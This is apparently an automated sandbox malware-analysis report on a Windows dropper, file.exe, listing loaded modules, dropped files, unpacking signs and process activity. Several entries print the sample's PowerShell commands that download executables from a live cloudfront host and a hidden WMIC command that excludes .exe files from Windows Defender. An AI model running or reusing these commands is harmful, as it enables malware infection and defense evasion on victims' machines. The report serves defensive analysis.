Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: security.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: olepro32.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: wkscli.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: schedcli.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: logoncli.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: msxml6.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: idndl.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: bitsproxy.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\u2xs.3.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Section loaded: netutils.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.17.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.17.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.17.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.17.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.17.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.17.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\i1.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mozglue.pdbP source: u2xs.0.exe, 00000008.00000002.3041646591.0000000068C8D000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\relay.pdb source: run.exe, 0000000B.00000002.2430367136.0000000068BE7000.00000002.00000001.01000000.0000000E.sdmp, run.exe, 00000048.00000002.2702582902.0000000068697000.00000002.00000001.01000000.0000000E.sdmp, relay.dll.6.dr
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2105621926.00000000030E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb@ source: u2xs.0.exe, 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: C:\letagahukob\lox.pdb source: i1.exe, 00000006.00000003.2143790101.0000000005D31000.00000004.00000020.00020000.00000000.sdmp, u2xs.0.exe, 00000008.00000000.2141333579.0000000000411000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: B C:\cuxi.pdb source: i1.exe, 00000006.00000000.2080168862.0000000000411000.00000002.00000001.01000000.00000007.sdmp, i1.exe, 00000006.00000002.2693736417.00000000040CE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000007.00000002.2129722133.0000000007516000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ws\dll\System.pdb@C source: powershell.exe, 00000007.00000002.2129722133.0000000007516000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\cuxi.pdb source: i1.exe, 00000006.00000000.2080168862.0000000000411000.00000002.00000001.01000000.00000007.sdmp, i1.exe, 00000006.00000002.2693736417.00000000040CE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: run.exe, 0000000B.00000002.2396564347.000000000435B000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000B.00000002.2399636203.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000B.00000002.2401218324.0000000004B6F000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2646807819.0000000004BEF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2650508923.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000048.00000002.2694623651.0000000004370000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000048.00000002.2693872160.0000000004014000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000048.00000002.2696609926.000000000482A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 0000000B.00000002.2396564347.000000000435B000.00000004.00000020.00020000.00000000.sdmp, run.exe, 0000000B.00000002.2399636203.00000000046B0000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000B.00000002.2401218324.0000000004B6F000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2646807819.0000000004BEF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000D.00000002.2650508923.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000048.00000002.2694623651.0000000004370000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000048.00000002.2693872160.0000000004014000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000048.00000002.2696609926.000000000482A000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ApproveChildRequest.pdb source: i3.exe, 0000000C.00000003.2324373570.00000000005E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nss3.pdb source: u2xs.0.exe, 00000008.00000002.3042071261.0000000068E4F000.00000002.00000001.01000000.00000017.sdmp
Source:	Binary string: mozglue.pdb source: u2xs.0.exe, 00000008.00000002.3041646591.0000000068C8D000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 0000000B.00000002.2349814954.0000000000E0C000.00000002.00000001.01000000.0000000D.sdmp, run.exe, 0000000B.00000000.2283984146.0000000000E0C000.00000002.00000001.01000000.0000000D.sdmp, run.exe, 00000048.00000002.2689699687.0000000000E0C000.00000002.00000001.01000000.0000000D.sdmp, run.exe, 00000048.00000000.2605971027.0000000000E0C000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: ApproveChildRequest.pdbGCTL source: i3.exe, 0000000C.00000003.2324373570.00000000005E0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbi source: powershell.exe, 00000007.00000002.2105621926.0000000003143000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe

Unpacked PE file: 8.2.u2xs.0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\i1.exe	Unpacked PE file: 6.2.i1.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Unpacked PE file: 8.2.u2xs.0.exe.400000.0.unpack

Suspicious powershell command line found

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell start-process -WindowStyle Hidden gpupdate.exe /force

Source: BIT157D.tmp.20.dr

Static PE information: 0xEC3B20ED [Thu Aug 4 12:07:09 2095 UTC]

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe

Code function: 8_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

8_2_00416240

Source: wygmbcpqogng.13.dr	Static PE information: real checksum: 0x0 should be: 0xc411c
Source: relay.dll.11.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: INetC.dll.0.dr	Static PE information: real checksum: 0x0 should be: 0x69a0
Source: i3.exe.10.dr	Static PE information: real checksum: 0x0 should be: 0x65c99d
Source: relay.dll.6.dr	Static PE information: real checksum: 0x18dd31 should be: 0x1877ea
Source: EHJDHJKFIE.exe.8.dr	Static PE information: real checksum: 0x0 should be: 0x8897e
Source: i1.exe.5.dr	Static PE information: real checksum: 0x78dfd should be: 0x78dff
Source: file.exe	Static PE information: real checksum: 0x0 should be: 0x11155
Source: tiktok[1].exe.8.dr	Static PE information: real checksum: 0x0 should be: 0x8897e

Source: u2xs.3.exe.6.dr	Static PE information: section name: .didata
Source: freebl3.dll.8.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.8.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.8.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.8.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.8.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.8.dr	Static PE information: section name: .didat
Source: nss3.dll.8.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.8.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.8.dr	Static PE information: section name: .00cfg
Source: softokn3[1].dll.8.dr	Static PE information: section name: .00cfg
Source: i3.exe.10.dr	Static PE information: section name: .sxdata
Source: Install.exe.12.dr	Static PE information: section name: .GIU
Source: SGcrFlL.exe.55.dr	Static PE information: section name: .GIU

Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0042786C push ecx; ret	6_2_0042787C
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0042780C push eax; ret	6_2_0042782A
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0042E3A5 push esi; ret	6_2_0042E3AE
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_00409D06 push ecx; ret	6_2_00409D19
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_004097B6 push ecx; ret	6_2_004097C9
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_04097CB3 pushad ; retf	6_2_04097CB4
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_04098D48 push ecx; iretd	6_2_04098D4E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0409A561 pushad ; retf	6_2_0409A568
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0409A24B push 2B991403h; ret	6_2_0409A252
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0409AB71 push 00000061h; retf	6_2_0409AB79
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05C99F6D push ecx; ret	6_2_05C99F80
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05CAC9FD push esp; retf	6_2_05CAC9FE
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05CAC3FF push esp; retf	6_2_05CAC407
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05CB1B72 push dword ptr [esp+ecx-75h]; iretd	6_2_05CB1B76
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05CB7AD3 push ecx; ret	6_2_05CB7AE3
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05CB7A73 push eax; ret	6_2_05CB7A91
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05C99A1D push ecx; ret	6_2_05C99A30
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_004176C5 push ecx; ret	8_2_004176D8
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C4B536 push ecx; ret	8_2_68C4B549
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00DCFAB6 push ecx; ret	11_2_00DCFAC9
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00DCFB55 push ecx; ret	11_2_00DCFB68
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00C80F0B push 8B00E3D1h; retf	11_2_00C80F10
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_68BC6365 push ecx; ret	11_2_68BC6378
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_68BC47D9 push ecx; ret	11_2_68BC47EC

Source: wygmbcpqogng.13.dr

Static PE information: section name: .text entropy: 6.816444465715168

Persistence and Installation Behavior

Tries to download and execute files (via powershell)

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/th.php?c=1000','stat')"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=444', 'i2.bat')"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d68kcn56pzfb4.cloudfront.net/load/dl.php?id=456','i3.exe')"	Jump to behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: reg.exe

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\wygmbcpqogng	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\nsvE79C.tmp\INetC.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Windows\System32\svchost.exe	File created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\i1.exe	File created: C:\Users\user\AppData\Local\Temp\u2xs.2\relay.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
